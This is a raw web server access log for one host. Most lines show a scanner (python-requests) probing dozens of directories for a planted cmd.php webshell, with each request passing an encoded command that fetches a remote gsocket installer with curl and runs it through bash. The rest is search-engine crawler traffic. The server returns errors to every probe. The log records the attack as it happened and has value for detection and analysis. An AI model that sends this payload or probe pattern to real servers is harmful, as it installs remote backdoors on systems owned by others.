cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:16:51 +0000] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:17:30 +0000] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.64 - - [13/Jun/2025:05:17:45 +0000] "GET /Postcard%20The%20Basilica%20of%20Sacre%20Coeur%20of%20Montmartre%20Paris%20France%20-%20UlVFWVVWQlNRS0FU/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:17:50 +0000] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:18:14 +0000] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:18:43 +0000] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:18:57 +0000] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:19:19 +0000] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 140.213.67.225 - - [13/Jun/2025:05:19:43 +0000] "GET /wp-login.php HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:19:55 +0000] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:20:16 +0000] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:20:19 +0000] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:20:45 +0000] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:20:58 +0000] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:21:15 +0000] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 0 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:21:34 +0000] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:22:30 +0000] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.197 - - [13/Jun/2025:05:22:41 +0000] "GET /40s%20Vintage%20Linde%20Blue%20Gold%20Red%20White%20Floral%20Vine%20Jacquard%20Mens%20Necktie%2053%20x%203.5%20-%20UVhFXVdbS1FVQUdT/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:22:51 +0000] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.11 - - [13/Jun/2025:05:23:46 +0000] "GET /PP.25%2024CT%20PP.%2025%2024CT%20-%20SET%20OF%201%20-%20UFdGWlZcR1ZZS0JR/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.204 - - [13/Jun/2025:05:23:58 +0000] "GET /Genuine%20Broan%20SV08355%20Blower%20and%20Light%20Knobs%20(2)%20For%20Range%20Hood%20E64%20E60%20-%20UFhHW15XQlJYSkRa/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:24:02 +0000] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:24:15 +0000] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:24:25 +0000] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.197 - - [13/Jun/2025:05:24:32 +0000] "GET /My%20Hero%20Academia%20Volume%2038%20Vol.38%20Newly%20Issue%20MHA%20JUMP%20Comic%20Manga%20Japanese%20-%20UlhFWFNWRFJVRkVX/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:25:02 +0000] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:25:54 +0000] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:26:21 +0000] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:26:50 +0000] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:26:52 +0000] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:26:53 +0000] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:27:04 +0000] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.22 - - [13/Jun/2025:05:27:12 +0000] "GET /B&B%20ELECTRONICS%20485LDRC%20OPTICALLY%20ISOLATED%20RS-232%20to%20RS-422/485%20-%20UFFGXFRcQVVTQUpQ/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:27:14 +0000] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:27:38 +0000] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:28:13 +0000] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:28:21 +0000] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.14 - - [13/Jun/2025:05:28:23 +0000] "GET /Transformers,%20Revenge%20of%20the%20Fallen%20Official%20Movie%20Adaptation%20IDW%20Comic%20NM%20-%20UVdFW1JWSlZQR0pb/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:28:48 +0000] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.22 - - [13/Jun/2025:05:28:51 +0000] "GET /100PCs/Pack%20Seeds%20Lotus%20lithops%20Succulents%20seed%20mix%20colorful%20great%20for%20home%20-%20UVZGXl9aR1RXREdb/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:28:57 +0000] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:29:08 +0000] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.11 - - [13/Jun/2025:05:29:47 +0000] "GET /Darius%20II%202%20with%20Manual%20Sega%20Mega%20Drive%20Genesis%20Japanese%20version%201990%20-%20UlZFXVReQ1RTR0dT/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:30:20 +0000] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:30:21 +0000] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:30:49 +0000] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:31:11 +0000] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:31:28 +0000] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:31:46 +0000] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:32:23 +0000] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:32:58 +0000] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.22 - - [13/Jun/2025:05:33:21 +0000] "GET /I%20love%20you,%20my%20cuddle%20bug%20-%20UFlEWlZZSlFZQ0Jb/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:33:27 +0000] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.14 - - [13/Jun/2025:05:33:35 +0000] "GET /Gecko%20Moria%20SR%20OP06-086%20SR%20One%20Piece%20TCG%20Wings%20Of%20The%20Captain%20English%20NM%20-%20UlZFXlNdQFVVR0ZQ/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:33:35 +0000] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.204 - - [13/Jun/2025:05:34:18 +0000] "GET /Disney%20Descendants%202%20Evie%20Doll%20Isle%20Of%20The%20Lost%20Blue%20Hair%20Hasbro%202016%20-%20UldFUFFZRlZZSktV/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.14 - - [13/Jun/2025:05:34:36 +0000] "GET /Tampa%20Bay%20Buccaneers%20Super%20Bowl%20LV%20Champs%20Golden%20Classic%20Helmet%20Display%20Case%20-%20UFJGXVBXRFJYSkFb/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.14 - - [13/Jun/2025:05:34:45 +0000] "GET /a151na-touchpad-button-touchpad-mouse-button-for-dell-latitude-e5470-e5570-UldHUVVfSlpVRUVV HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:34:50 +0000] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:35:06 +0000] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.22 - - [13/Jun/2025:05:35:12 +0000] "GET /Dell%20Latitude%205490%2014%22%20Laptop%20i5-8350U%208GB%20RAM%20256GB%20SSD%20w/Adapter%20-%20UFhGX1dXQFBVRkBX/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:35:18 +0000] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:35:28 +0000] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:35:47 +0000] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:36:07 +0000] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:36:38 +0000] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:36:41 +0000] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.13 - - [13/Jun/2025:05:37:36 +0000] "GET /Medicus%20Core%20Links%20Black%20Gold%20Swing%20Trainer%20Stop%20Slicing%20Stop%20Hooking%20Stop%20Pull%20-%20UFlBXVJWRVNQRkJX/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:37:37 +0000] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.204 - - [13/Jun/2025:05:38:09 +0000] "GET /Bob%20Bonn%20Wild%20West%20Art%20Rockin%20Kokopelli%20Bold%20Artwork%20Framed%20and%20Matted%20Print%20-%20UVZFX1ZbRVpRQkBS/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:38:26 +0000] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.19 - - [13/Jun/2025:05:38:28 +0000] "GET /Sonance%20LS6T%20SAT%20Landscape%20Series%206-1/2%22%202-Way%20Outdoor%20Speaker%2093370%20-%20UFdGWVJfQ1BTQ0pS/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:38:51 +0000] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.13 - - [13/Jun/2025:05:39:07 +0000] "GET /%20Angel%20Cherub%20Putto%20Wall%20Decor%209%22%20Wall%20Hanger%20Decor%20Gold%20Rose%20Gold%20Resin%20Foam%20-%20UFhGX1FdQlFVQEBU/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:39:28 +0000] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:39:42 +0000] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:40:19 +0000] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:40:20 +0000] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.204 - - [13/Jun/2025:05:40:39 +0000] "GET /Wonderful%20Pistachios%20In-Shell%20Roasted%20and%20Salted%20Nuts%2048%20Ounce%20Resealable%20Bag%20-%20UlRFXFZfRVdYQ0BV/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:40:44 +0000] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.19 - - [13/Jun/2025:05:40:45 +0000] "GET /2%20Oregon%2032%22%2072EXL105G%20Chain%20for%20Stihl%20MS%20462,%20MS%20462%20C-M%20-%20UFRGX1VYR1NQRkBR/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:41:14 +0000] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.19 - - [13/Jun/2025:05:42:21 +0000] "GET /Prive%20Revaux%20The%20Alchemist%20Blue%20Light%20JLO%20Readers%20Glasses%20-%20A352725%20-%20A352728%20-%20UlZGXVZWRFBXQ0tS/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:42:45 +0000] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:43:10 +0000] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:43:21 +0000] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:43:33 +0000] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:43:35 +0000] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:45:07 +0000] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.116 - - [13/Jun/2025:05:45:10 +0000] "GET /Chris%20Livingston%202023-24%20Elite%20Pen%20Pals%20On%20Card%20Auto%20RC%20Still%20Sealed%20-%20UVlFWVJeS1RWQEdb/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
